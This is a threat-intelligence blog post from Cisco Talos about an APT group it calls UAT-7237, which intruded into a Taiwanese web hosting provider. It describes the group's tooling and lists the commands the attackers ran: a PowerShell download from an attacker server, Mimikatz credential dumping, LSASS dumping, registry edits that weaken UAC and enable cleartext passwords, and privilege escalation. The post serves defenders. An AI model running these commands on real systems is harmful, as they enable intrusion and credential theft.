# UAT-7237 targets Taiwanese web hosting infrastructure

Source: Cisco Talos Blog, published 2025-08-15 (https://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/)

* Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.
* UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on open-source tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.
* UAT-7237 aims to establish long-term persistence in high-value victim environments.
* Talos also identified a customized shellcode loader in UAT-7237's arsenal that we track as "SoundBill." SoundBill can be used to decode and load any shellcode, including Cobalt Strike.

* * *

![UAT-7237 targets Taiwanese web hosting infrastructure](https://blog.talosintelligence.com/content/images/2025/08/UAT-5918-header.jpg)

Talos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of open-source tools, customized to a certain extent, including a customized shellcode loader we track as "SoundBill."

Talos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using Chinese as their primary language of choice.

While Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:

* UAT-7237 primarily relies on Cobalt Strike as its staple backdoor implant, while UAT-5918 relies primarily on Meterpreter-based reverse shells.
* After a successful compromise, UAT-5918 typically deploys a flurry of web shells. UAT-7237's deployment of web shells, however, is highly selective and limited to a chosen few compromised endpoints.
* While UAT-5918 relies on web shells as its primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.

In a recent intrusion, UAT-7237 compromised, infiltrated and established long-term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization's VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.

## Initial access and reconnaissance

UAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate whether the target is worth conducting further malicious actions on.

Reconnaissance consists of identifying remote hosts, both internal and on the internet:

    cmd /c nslookup <victim's_domain>
    cmd /c systeminfo
    cmd /c curl
    cmd /c ping 8[.]8[.]8[.]8
    cmd /c ping 141[.]164[.]50[.]141        // Attacker controlled remote server.
    cmd /c ping <victim's_domain>
    cmd /c ipconfig /all

While UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist its access, and later accessing the systems via RDP:

    cmd /c c:\temp\WM7Lite\download[.]exe hxxp[://]141[.]164[.]50[.]141/sdksdk608/win-x64[.]rar c:\temp\WM7Lite\1[.]rar

    powershell (new-object System[.]Net[.]WebClient).DownloadFile('hxxp[://]141[.]164[.]50[.]141/sdksdk608/vpn[.]rar','C:\Windows\Temp\vmware-SYSTEM\vmtools[.]rar')

Once UAT-7237 has set up initial access, reconnaissance and VPN-based access, it starts preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:

    cmd[.]exe /c cd /d "<remote_smb_share>"&net use
    cmd[.]exe /c cd /d "<remote_smb_share>"&dir \\<remote_smb_share>\c$\
    cmd[.]exe /c cd /d "C:\"&net group "domain admins" /domain
    cmd[.]exe /c cd /d "C:\"&net group "domain controllers" /domain

In addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI)-based tooling such as SharpWMI and WMICmd during reconnaissance and proliferation:

    cmd[.]exe /c cd /d "C:\"&C:\ProgramData\dynatrace\sharpwmi[.]exe <IP> <user> <pass> cmd whoami

    cmd.exe /c cd /d "C:\DotNet\"&WMIcmd.exe

    wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami

    wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\1.txt

SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code execution.

UAT-7237 fingerprinted any systems subsequently accessed using rudimentary Windows commands such as:

    cmd.exe /c systeminfo
    cmd.exe /c tasklist
    cmd.exe /c net1 user /domain
    cmd.exe /c whoami /priv
    cmd.exe /c quser

## Post-compromise tooling and actions on objectives

### SoundBill

After compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as "SoundBill." SoundBill is based on "VTHello" and is a shellcode loader written in Chinese that decodes a file on disk named "ptiti.txt" and executes the resulting shellcode.

It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.

SoundBill's payload (i.e., the shellcode) may be anything, for example a customized implementation of Mimikatz:

    VTSB.exe privilege::debug sekurlsa::logonpasswords exit

Or it may be a mechanism to execute arbitrary commands on the infected system, such as:

    c:\temp\vtsb.exe -c whoami

The shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long-term access for information stealing. So far, the Cobalt Strike beacons Talos has found to be compatible with SoundBill communicate over HTTPS with their command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws

### JuicyPotato

UAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints, such as:

    cmd.exe /c c:\hotfix\juicy2.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami

## Configuration changes

On several occasions during intrusions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restrictions via the registry:

    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

They also attempted to enable the storage of cleartext passwords (WDigest):

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

UAT-7237 also accessed the Component Services management console, likely to adjust privileges for its malicious components:

    mmc comexp.msc

## UAT-7237's pursuit of credentials

UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved its use of Mimikatz over time, likely as a means of evading detection, by using a Mimikatz instance built into SoundBill to extract credentials:

| Filename/command | Tooling name |
|---|---|
| abc.dll | Comsvcs.dll for LSASS process dumping |
| Fileless.exe | Mimikatz |
| VTSB.exe privilege::debug sekurlsa::logonpasswords exit | SoundBill with the Mimikatz payload |

Furthermore, UAT-7237 also finds VNC credentials and configuration on infected endpoints by searching the registry and disk:

    reg query "HKCU\Software\ORL\WinVNC3\Password"
    dir c:\*vnc.ini /s /b

Another (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable, again for credential extraction:

    cmd.exe /c C:\hotfix\invoketest.exe -cmd "cmd /c C:\hotfix\1.bat"
    cmd.exe /c C:\hotfix\invoketest.exe -cmd "cmd /c C:\hotfix\Project1.exe C:\hotfix\SSP.dll"

"Project1[.]exe" above is the ssp_dump_lsass project on GitHub. It takes a DLL file as an argument and injects it into the Local Security Authority Subsystem Service (LSASS) process, which then dumps the LSASS process into a BIN file.

Optionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:

    cmd.exe /c c:\hotfix\juicy2.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\windows\system32\cmd.exe" -a "/c c:\hotfix\1.bat"

The process dump obtained is then staged into an archive for exfiltration:

    cmd.exe /c "c:\program files\7-Zip\7z.exe" a C:\hotfix\1.zip C:\hotfix\1.bin

## Proliferating through the enterprise

UAT-7237 uses the following network scanning tooling:

**FScan:** A network scanner used to scan for open ports across IP subnets:

    fileless -h 10.30.111.1/24 -nopoc -t 20

**SMB scans:** To identify SMB service information on specific endpoints:

    smb_version 10.30.111.11 445

As soon as accessible systems are found, UAT-7237 conducts additional recon to pivot to them using credentials it has extracted previously:

    cmd[.]exe /c netstat -ano |findstr 3389
    cmd[.]exe /c nslookup <victim's_subdomains>
    cmd[.]exe /c net use <IP>\ipc$ <pass> /user:<userid>
    cmd[.]exe /c dir \\<remote_system>\c$
    cmd[.]exe /c net use \\<remote_system>\ipc$ /del

## SoftEther VPN

The remote server hosting the SoftEther VPN client consisted of two archives: one containing the client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.

Talos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:

* The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.
* UAT-7237 specified Simplified Chinese as the preferred display language in its VPN client's language configuration file, indicating that the operators were proficient in the language.

## Coverage

Ways our customers can detect and block this threat are listed below.

![UAT-7237 targets Taiwanese web hosting infrastructure](https://blog.talosintelligence.com/content/images/2025/08/data-src-image-1b5a3146-5822-4e2f-9a64-3845e031a8a3.jpeg)

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover this threat:

* Snort v2: 64908 - 64916
* Snort v3: 301209 - 301212

## IOCs

IOCs for this research can also be found at our GitHub repository _here_.